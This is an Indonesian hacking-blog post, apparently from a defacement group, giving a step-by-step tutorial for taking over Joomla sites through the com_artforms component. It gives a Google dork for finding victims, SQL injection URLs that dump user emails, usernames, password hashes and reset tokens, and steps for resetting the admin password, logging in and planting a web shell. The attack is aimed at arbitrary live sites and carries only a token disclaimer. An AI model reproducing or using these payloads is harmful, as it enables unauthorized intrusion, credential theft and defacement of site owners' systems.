Advertisement
Advertisement
Advertisement

Search

Ingat Kami Disini Hanya Memberi Pengetahuan dan tidak lebih .. Silahkan menggunakan Pengetahuan tersebut dengan bijak,dan kami tidak bertanggung jawab atas apapun yang terjadi! - by CEO,Admin,Author IHC-Team
TEAM KAMI SUDAH BUBAR SEJAK 2016 best Regard AnonGhost.ID | INDONESIA HACKER CYBER TEAM

Deface Tutorial exploit joomla com_artforms

Posted by IHC-Team


             Kali ini saya akan membahas tentang exploit joomla com_artforms. Dengan exploit ini, kita akan melakukan reset password sebuah web berbasis joomla. Dan tentunya dengan reset password inilah, kita bisa masuk ke web tersebut sebagai admin dan menanamkan shell/backdoor. Bagaimana caranya? Simak baik - baik.


1. Ketik dork ini ke google : inurl:"option com_artforms"

2. Pilih salah 1 web untuk dijadikan target

3. Masukkan exploit ini : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
Contoh : www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

4. Nanti anda akan melihat email dari web tersebut. Copy email tersebut ke notepad.

5. Sekarang anda masuk ke tempat reset password dengan buka tab baru, lalu masukkan kode ini /index.php?option=com_user&view=reset
Contoh : www.site.com/index.php?option=com_user&view=reset

6. Sebelum reset password, anda akan disuruh memasukkan email. Nah, masukkan email yang tadi anda copy ke notepad. Lalu klik "submit"

7. Selanjutnya, anda akan disuruh memasukkan token. Nah anda buka tab baru dan masukkan exploit ini : index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Contoh :www.site.com/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

8. Nanti akan muncul kode aktivasi/token seperti ini admin eda7d6142fac40a533b56407a4617371. Yang berwarna merah adalah username webnya, sedangkan yang kuning adalah tokennya. Anda masukkan token tersebut pada form memasukkan token yang tadi. Klik enter.

9. Kini form untuk mereset password sudah muncul, nah masukkan password yang anda inginkan untuk masuk ke web tersebut sebagai admin. Misal : Dr.1n73ct10n

10. Jika berhasil, anda masuk deh ke panel adminnya : www.site.com/administrator

11. Masukkan username yang tadi ditemukan dan password yang sudah anda reset.
Contoh : username = admin, password = Dr.1n73ct10n

12. Dan kini anda berhasil masuk sebagai admin. Saatnya mulai menanam shell anda

Related Post



Posting Komentar

~ SEBELUM KOMEN , PERHATIKAN PERATURAN KOMENTAR DI SINI ~

1. Dilarang Komentar Dengan Kata Kasar , PROMOSI , SARA , PORNOGRAFI , SPAM , dan Hal-Hal yg tidak bagus
2. Dilarang koment dengan LINK aktif contoh WEBSITE , BLOG

Visitor

hit counter